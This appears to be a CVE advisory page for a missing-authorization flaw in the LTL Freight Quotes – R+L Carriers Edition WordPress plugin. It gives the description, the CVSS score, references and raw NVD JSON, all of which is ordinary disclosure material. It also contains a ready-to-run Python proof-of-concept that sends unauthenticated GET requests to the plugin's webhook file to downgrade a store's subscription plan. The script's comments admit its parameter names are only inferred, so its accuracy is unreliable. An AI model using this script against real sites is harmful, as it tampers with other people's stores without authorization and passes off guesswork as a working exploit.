CVE-2026-3646

Description

The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to Missing Authorization via the plugin's webhook handler in all versions up to, and including, 3.3.13. This is due to missing authentication, authorization, and nonce verification on a standalone PHP file that directly processes GET parameters and updates WordPress options. This makes it possible for unauthenticated attackers to modify the plugin's subscription plan settings, effectively downgrading the store from a paid plan to the Trial Plan, changing the store type, and manipulating subscription expiration dates, potentially disabling premium features such as Dropship and Hazardous Material handling.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

LTL Freight Quotes – R+L Carriers Edition <= 3.3.13

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
import requests

def exploit(target_url):
    # The vulnerable endpoint path based on the CVE description
    vuln_path = "/wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php"
    
    # Construct the full URL
    url = f"{target_url}{vuln_path}"
    
    # Payload parameters to downgrade the subscription plan
    # Parameter names inferred from typical plugin structures and description context
    payload = {
        "plan_type": "trial",
        "store_type": "standard",
        "expiry_date": "2025-01-01"
    }
    
    try:
        # Send unauthenticated GET request
        response = requests.get(url, params=payload, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Request sent successfully to {url}")
            print(f"[+] Response: {response.text}")
            print("[+] Plugin settings may have been modified.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with target URL
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3646
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3646
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3646/
[4] VulDB https://vuldb.com/cve/CVE-2026-3646
[5] https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L32
[6] https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L33
[7] https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L40
[8] https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L43
[9] https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L46
[10] https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L49
[11] https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L32
[12] https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L33
[13] https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L40
[14] https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L43

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3646", "sourceIdentifier": "[email protected]", "published": "2026-04-08T05:16:06.130", "lastModified": "2026-04-27T19:04:22.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to Missing Authorization via the plugin's webhook handler in all versions up to, and including, 3.3.13. This is due to missing authentication, authorization, and nonce verification on a standalone PHP file that directly processes GET parameters and updates WordPress options. This makes it possible for unauthenticated attackers to modify the plugin's subscription plan settings, effectively downgrading the store from a paid plan to the Trial Plan, changing the store type, and manipulating subscription expiration dates, potentially disabling premium features such as Dropship and Hazardous Material handling."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L33", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L40", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L43", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L46", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L49", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L33", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L40", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L43", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L46", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L49", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3492361%40ltl-freight-quotes-rl-edition&new=3492361%40ltl-freight-quotes-rl-edition&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a144c9ae-dfdb-4ea2-8c27-84d59439c72a?source=cve", "source": "[email protected]"}]}}